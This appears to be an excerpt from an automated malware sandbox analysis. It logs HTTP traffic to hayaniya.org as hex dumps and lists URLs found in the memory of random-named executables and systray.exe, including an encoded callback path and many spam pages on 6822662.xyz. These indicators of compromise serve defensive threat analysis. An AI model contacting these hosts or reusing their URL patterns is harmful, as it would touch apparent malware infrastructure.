                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:44:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:44:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:44:11 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hayaniya.org/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be 4e 5f cc ff 90 59 f3 6f b4 fb db 3c f0 12 1e e7 3a 73 6c e9 e1 3b 15 06 ef 4b 61 0b 15 df 5f f0 77 3f c4 a7 88 86 d8 27 28 92 24 e3 f7 80 61 e9 93 fb 7a fd 58 cd a0 03 0d fd 03 1a ef 7e 12 d3 2f 49 0c 87 4b 94 30 0d fa d9 be a1 3d ff 97 76 ed 67 be 3d e3 61 de 1b 53 8e 28 57 92 f2 98 3a 28 4b 3b 30 3a cd 66 33 3a 35 5a bd fc e7 6c 6c e9 ee 55 92 ef bb 3c ce 16 f1 88 72 82 fb 9a e8 fb ab 1c e7 9b 55 ce 82 99 22 92 63 05 e7 54 b3 08 44 82 a3 88 51 07 2b 2a b8 25 e3 f8 a7 70 13 08 65 54 4c cc 1b a4 d7 b8 c7 f0 17 89 28 4e f6 97 bc ea 6f e9 f3 aa 3a e2 75 79 78 84 b8 96 f9 77 07 60 b1 fc a2 df fc d1 fc d9 fc 6b 70 be b8 10 8f 23 c2 10 54 14 57 81 c5 8e a4 91 3a dc 99 52 ee 8a 69 e3 68 1a 91 50 7c 4e 3f 22 4a 51 ee c7 c6 c4 78 68 da 38 26 ff 22 99 79 50 b4 fd d4 fa d4 8a 1b d3 ac e7 a7 56 ae c6 f8 53 68 2e c9 a7 56 5e fc a9 d5 ea 35 9a 8d ce a7 d6 a0 7d 3a 68 7f 6a 99 fb 26 39 55 50 df 88 b8 0f 8f f8 c4 7f bb 7e 50 98 77 83 df 0f 74 43 b0 b2 b7 48 a4 43 cc 83 87 26 a8 19 6e 91 97 15 fd f3 f6 55 1e 3e b5 a6 11 a8 dd 61 89 9b 0d fa 3c ce 1d 79 09 82 13 13 40 db 08 29 6f 7c 1e ff ec 84 c8 49 bf 31 68 b4 cc b3 b3 07 3b d6 4f de 33 3e 0e 68 6c 78 94 11 03 7e 71 a2 04 f2 09 27 12 46 ba c6 4f ac 9d f7 bc 84 3b 99 14 76 e9 3e df 7b 78 82 a5 21 f6 e3 7d f2 a0 f4 1b ce 2e d9 7b a8 e4 2c 8f a9 c9 c3 38 89 22 21 d5 c7 24 56 f1 01 d9 57 34 04 0b 87 d1 c1 2e 27 53 e3 17 d0 78 af 71 82 59 42 3e f4 76 f7 ce 1e c4 24 8e a1 cd 47 4a 48 e0 a9 11 13 f5 2b 40 bb 2b f6 ff fb 47 1f fe 8f 46 ac 24 5c 8d 7a Data Ascii: 1faa.$B/srXtz'D&H
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:46:26 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:46:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:46:31 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Dec 2024 07:46:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: systray.exe, 00000013.00000002.4782860137.0000000005646000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000002F16000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: MN1qo2qaJmEvXDP.exe, rlJvZXSinaRi.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: MN1qo2qaJmEvXDP.exe, rlJvZXSinaRi.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: systray.exe, 00000013.00000002.4782860137.000000000596A000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000323A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://hayaniya.org/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM
                Source: MN1qo2qaJmEvXDP.exe, rlJvZXSinaRi.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: MN1qo2qaJmEvXDP.exe, 00000000.00000002.2418207809.0000000002641000.00000004.00000800.00020000.00000000.sdmp, MN1qo2qaJmEvXDP.exe, 00000000.00000002.2418207809.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, rlJvZXSinaRi.exe, 0000000B.00000002.2563827144.0000000003101000.00000004.00000800.00020000.00000000.sdmp, rlJvZXSinaRi.exe, 0000000B.00000002.2563827144.00000000031B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/020c57699403.html
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/022f57699401.html
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/072d399924.html
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/077b57699346.html
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/084b57699339.html
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/138b57699285.html
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/149c599845.html
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/188b57699235.html
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/233e199765.html
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/239f57699184.html
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/273e57699150.html
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/313f599681.html
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/31b57699392.html
                Source: aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/324c57699099.html
                Source: systray.exe, 00000013.00000002.4782860137.0000000005FB2000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000013.00000002.4784664650.00000000078E0000.00000004.00000800.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.6822662.xyz/Dating/343e599651.html
